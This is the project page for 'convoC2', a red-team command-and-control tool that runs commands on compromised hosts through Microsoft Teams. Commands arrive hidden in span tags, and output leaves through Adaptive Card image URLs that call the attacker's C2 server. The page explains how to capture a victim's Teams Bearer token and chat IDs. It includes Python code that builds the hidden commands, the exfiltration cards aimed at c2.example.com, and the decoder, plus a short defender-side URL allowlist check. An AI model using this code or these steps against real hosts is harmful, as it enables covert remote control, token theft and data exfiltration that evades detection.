convoC2: execute system commands on compromised hosts through Microsoft Teams

convoC2

Command and Control infrastructure that allows Red Teamers to execute system commands on compromised hosts through Microsoft Teams. Commands are infiltrated to the agent inside hidden span tags in Microsoft Teams messages, and command output is exfiltrated in the image URLs of Adaptive Cards, which trigger out-of-band requests to the C2 server. Detection is harder because there is no direct communication between victim and attacker: the victim host only sends HTTP requests to Microsoft servers, and antivirus products do not look into the MS Teams log files.

Requirements

To get it working, you will need to set up a few things:

  • Create a Teams channel with a Workflow Incoming Webhook: this is where the Adaptive Cards containing the command output are received. Keep a browser window with this channel open while using the server; if the cards are not rendered, the image URLs are never requested and the server receives nothing from the agents.
  • Fetch IDs and Auth Token: Teams initializes a chat with a POST to https://teams.microsoft.com/api/chatsvc/emea/v1/threads, with the unique IDs of the victim and the attacker in the body. The response returns the threadId in the path of the Location header URL. The Bearer token of that same request is used to authenticate to https://teams.microsoft.com/api/chatsvc/emea/v1/users/ME/conversations/<threadId>/messages, the endpoint for sending messages. So you only need to grab these three things; the server takes care of the rest.
  • Make sure you have a public-facing host that allows inbound HTTP traffic on port 80: this is where the image requests carrying the command output arrive.
  • Teams needs to be running on the victim host; running in the background is fine.

After starting the server you can receive new agents and control them, using the data obtained above for authentication. Check the demo out for a usage example.
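The following is an added, self-contained Python example of the two covert channels described above (hidden span in the Teams message for the command, Adaptive Card image URL for the output) and of the POST to the messages endpoint from the requirements list; it is not convoC2's own code. Assumptions not taken from the page: commands and outputs are base64url-encoded, the span is hidden with `display:none`, the message body fields `messagetype`/`contenttype` are what the chatsvc endpoint expects, the Adaptive Card is wrapped in the usual Workflow webhook `attachments` envelope, and the allowlist of Microsoft image hosts used by the defender-side check. Nothing is sent over the network; the functions only build and parse the payloads. The hypothetical hostnames `c2.example.com` and the sample output are constructed for the example.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Assumption: a hidden span carries the base64url-encoded command.
HIDDEN_SPAN_RE = re.compile(
    r'<span[^>]*display:\s*none[^>]*>([A-Za-z0-9_\-=]+)</span>', re.IGNORECASE)

# Assumption (defender side): image hosts a legitimate Teams card is expected to use.
ALLOWED_IMAGE_HOST_SUFFIXES = (
    "microsoft.com", "office.net", "office.com", "sharepoint.com",
    "microsoftonline.com", "skype.com")


def build_command_html(command: str) -> str:
    """Server side: hide a command in a Teams message body behind a harmless visible text."""
    encoded = base64.urlsafe_b64encode(command.encode()).decode()
    return f'<p>hi</p><span style="display:none">{encoded}</span>'


def build_send_request(thread_id: str, bearer_token: str, html: str) -> dict:
    """Server side: the request the server would issue to the messages endpoint named
    in the README. The endpoint is from the README; the JSON body fields are an assumption."""
    return {
        "url": ("https://teams.microsoft.com/api/chatsvc/emea/v1/users/ME/"
                f"conversations/{thread_id}/messages"),
        "headers": {"Authorization": f"Bearer {bearer_token}",
                    "Content-Type": "application/json"},
        "json": {"content": html, "messagetype": "RichText/Html", "contenttype": "text"},
    }


def extract_command(message_html: str):
    """Agent side: recover the command from a message body read from the local Teams logs.
    Returns None when the message carries no hidden span."""
    match = HIDDEN_SPAN_RE.search(message_html)
    if not match:
        return None
    return base64.urlsafe_b64decode(match.group(1)).decode()


def build_output_card(output: str, c2_host: str) -> dict:
    """Agent side: Workflow webhook payload with an Adaptive Card whose image URL carries
    the command output. The Teams client fetches the image when the channel is rendered,
    which is the out-of-band request that delivers the output to the C2 host."""
    encoded = base64.urlsafe_b64encode(output.encode()).decode()
    card = {
        "$schema": "http://adaptivecards.io/schemas/adaptive-card.json",
        "type": "AdaptiveCard",
        "version": "1.4",
        "body": [{"type": "Image", "url": f"http://{c2_host}/{encoded}.png"}],
    }
    return {"type": "message",
            "attachments": [{"contentType": "application/vnd.microsoft.card.adaptive",
                             "content": card}]}


def decode_output_from_request(path_or_url: str) -> str:
    """C2 side: decode the output from the path of the incoming image request
    (accepts either the raw request path or a full URL)."""
    path = unquote(urlsplit(path_or_url).path)
    name = path.strip("/").rsplit("/", 1)[-1]
    if name.endswith(".png"):
        name = name[:-4]
    return base64.urlsafe_b64decode(name).decode()


def _walk_card_elements(element: dict):
    """Yield an Adaptive Card element and everything nested under it."""
    yield element
    for key in ("body", "items", "columns"):
        for child in element.get(key, []):
            yield from _walk_card_elements(child)


def suspicious_image_urls(webhook_payload: dict,
                          allowed_suffixes=ALLOWED_IMAGE_HOST_SUFFIXES) -> list:
    """Defender side: image URLs in the card whose host is outside the allowlist.
    A card that makes the client fetch images from an arbitrary host is the tell."""
    found = []
    for attachment in webhook_payload.get("attachments", []):
        for element in _walk_card_elements(attachment.get("content", {})):
            if element.get("type") != "Image":
                continue
            host = (urlsplit(element.get("url", "")).hostname or "").lower()
            if not any(host == s or host.endswith("." + s) for s in allowed_suffixes):
                found.append(element["url"])
    return found


if __name__ == "__main__":
    # Constructed walk-through of one command/response round trip.
    html = build_command_html("whoami")
    print(build_send_request("19:example-thread@thread.v2", "<token>", html)["url"])
    print("agent got:", extract_command(html))
    payload = build_output_card("desktop-01\\alice\r\n", "c2.example.com")
    image_url = payload["attachments"][0]["content"]["body"][0]["url"]
    print("C2 decoded:", repr(decode_output_from_request(image_url)))
    print("flagged:", suspicious_image_urls(payload))
```

The output travels in a single URL path segment, so this example does not handle outputs longer than what a URL and the Teams client will accept; a real agent has to split long outputs across several cards. On the defensive side, the same allowlist check can be run over webhook traffic or proxy logs: an Adaptive Card that makes the client fetch an image from a host you do not control is the observable artifact of this channel.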

Download & Use